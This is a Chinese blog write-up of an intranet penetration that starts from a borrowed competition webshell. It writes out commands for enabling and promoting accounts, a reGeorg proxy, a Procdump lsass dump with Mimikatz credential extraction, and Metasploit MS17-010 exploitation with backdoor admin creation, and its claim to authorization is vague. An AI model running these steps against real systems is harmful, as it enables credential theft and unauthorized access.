内网渗透实战(二)

一直少有机会接触内网渗透实战,最近刚好借助正在参加比赛的大佬施舍的webshell来复习一下。
注:本次渗透未授权期内项目,渗透手段未超出约束范围,敏感信息均已打码。

信息梳理

从webshell开始吧,先进行简单的信息梳理:目标服务器为内网服务器,无公网IP,当前权限为最高权限system。

查看下arp缓存,未发现有其他网段的存在:

查看系统信息,没有所属域:

添加用户

#启用guest用户
net user guest /active:yes
#修改guest用户密码
net user guest 1q2w3e4r!
#添加管理员用户组
net localgroup administrators guest /add

设置代理

内网渗透思路拓展需要,本次教程决定放弃msf+frp的组合,采用reGeorg+Proxifier进行本次任务。

python .\reGeorgSocksProxy.py -p 1988 -u target_url(脚本url)

配置Proxifier代理服务器:


配置并启用规则:

密码获取

登录目标服务器:

第一想法自然是mimikatz,然而翻车了,虽然已经是管理员权限,但非最高权限,本处没有成功:

privilege::debug#提权
sekurlsa::logonpasswords#抓取密码

于是转战另一种方案Procdump+Mimikatz:
Procdump由微软官方提供:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

#导出lsass.exe进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
#使用mimikatz破解导出的文件lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

获取明文密码及hash,我们可以看到我们刚刚启用的guest:

当然,还有administrator的明文密码:

用户信息搜集

登录administrator用户,刚登上去的一瞬间慌的一批,以为将管理员顶下来了,查看任务管理器发现还好开启了单用户多人登录的设置,233333。

咳咳,稳住,不要忘记本次渗透测试任务的目标:内网
开始用户信息搜集:
1)192.168.100.35应该是个比较重要的点:

2)192.168.100.51部署了vmware vsphere

3)居然开着个ssh连接,192.168.100.50买一赠一?

4)从管理员常用软件分析,发现了所使用的百度网盘且保存了密码,23333:

内网端口探测

代理端口扫描工具对内网进行轻度探测(nmap流量太大):

发现了几个内网web应用,不知道有没有对应外网,接下来当然是对找到的系统进行密码爆破,毕竟内网密码这一块都会松懈,其中不乏一些内网网络相关的管理系统,这里就不放图啦。

永恒之蓝

永恒之蓝专项检测,喜提服务器X9:),来利用一下,emmmm,虽然说过本次不上msf,但确实没见过永恒之蓝的exp,么得办法,真香。

首先将本机权限拉满,以防不测:

添加路由,准备内网探测:

run get_local_subnets    获取当前网段
run  autoroute -s 192.168.100.0/24  添加路由
run autoroute -p    路由查询

使用ms17_010检测模块简单确认下,基本跟我们刚刚跑的结果一致:

use auxiliary/scanner/smb/smb_ms17_010

然后开始ms17_010利用,我使用了两个脚本,第一个虽然主流一点但并没有成功,最终选择了第二个,关于它们的选择大家可以参见我的metasploit系列教程:

use exploit/windows/smb/ms17_010_eternalblue
use admin/smb/ms17_010_command

借助ms17_010_command进行用户创建并添加用户组

net user gvest 1q2w3e4r! /add  
net localgroup administrators gvest /add

成功登录目标服务器192.168.100.1:

成功登录上传mimikatz直接获得administrator明文密码,使用参考上面,不过这里没有用到Procdump。

随后发现该密码为通用密码,内网内多台服务器均使用该密码,得,剩下的也不用再演示啦,重复性工作没什么可说的。

弱口令测试

然后我们再来捡捡漏,接下来开始对内网弱口令情况深度检测,发现以下内容:

其中ftp泄露了大量敏感文件:

这里顺便给大家案例个连接工具吧:mobaxterm,支持多种协议的远程连接:

ssh访问爆出的几个弱口令发现,只有一台是linux服务器,还有一台是RG-ACE流控设备,还有一台没看懂>.<,该好好补课了的说。

同样telnet弱口令也属于该设备:

Memcached应该是开启了限制本地访问还是怎么,telnet连接目标服务器端口反馈为error。

END

那么,本次测试暂告一段落吧。
一直想找一个存在域的内网操练,可惜这次依然没有遇到,可能太过敏感东西在本文中简单略过了,但不得不说我的内网渗透的思路依然混乱,借朋友的话说:就是拿着WEB渗透的思路在内网转悠没有方向,手里拿着思维导图却在迷茫。内网经验欠缺,还请大佬轻喷,鞠躬QAQ!

总结:

说明:本次渗透仅供比赛需要,同时也是用户隐私需求,没有对数据或系统口令做任何形式的爆破或获取,仅在服务器权限上进行了游荡。跳板服务器为192.168.100.191,最终获得服务器包括192.168.100.1在内的数十台服务器,除此以外还包括ftp、telnet等协议弱口令多个,收工~

经验:因为服务器处于内网,所以s5代理受限存在卡顿且对大数据流无法承受,我调用了目标服务器的TeamViewer用来传输文件,真香。对于内网全网的弱口令批量扫描等行为尽可能放到目标服务器上来做,原因同样是网络流量大的问题。

日常:再次催更MS08067实验室《内网安全攻防》!

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,542评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,596评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,021评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,682评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,792评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,985评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,107评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,845评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,299评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,612评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,747评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,441评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,072评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,828评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,069评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,545评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,658评论 2 350